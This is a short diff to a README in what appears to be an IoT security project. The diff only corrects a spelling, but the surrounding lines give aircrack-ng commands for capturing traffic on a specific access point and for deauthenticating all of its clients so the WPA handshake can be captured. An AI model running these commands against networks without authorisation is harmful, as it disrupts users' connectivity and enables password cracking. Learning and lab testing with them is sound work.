tamothee/IOTS/Readme.md

 `airodump-ng -c 1 --bssid 80:35:C1:13:C1:2C -w /root wlan0mon`

 Deauthenticate all clients from the network in order to get them to re-authenticated themselves.
-While clients attempt to reauthenticate themselves, we would be able to capture the WPA handshake.
+While clients attempt to re-authenticate themselves, we would be able to capture the WPA handshake.

 `aireplay-ng -0 10 -a 80:35:C1:13:C1:2C wlan0mon`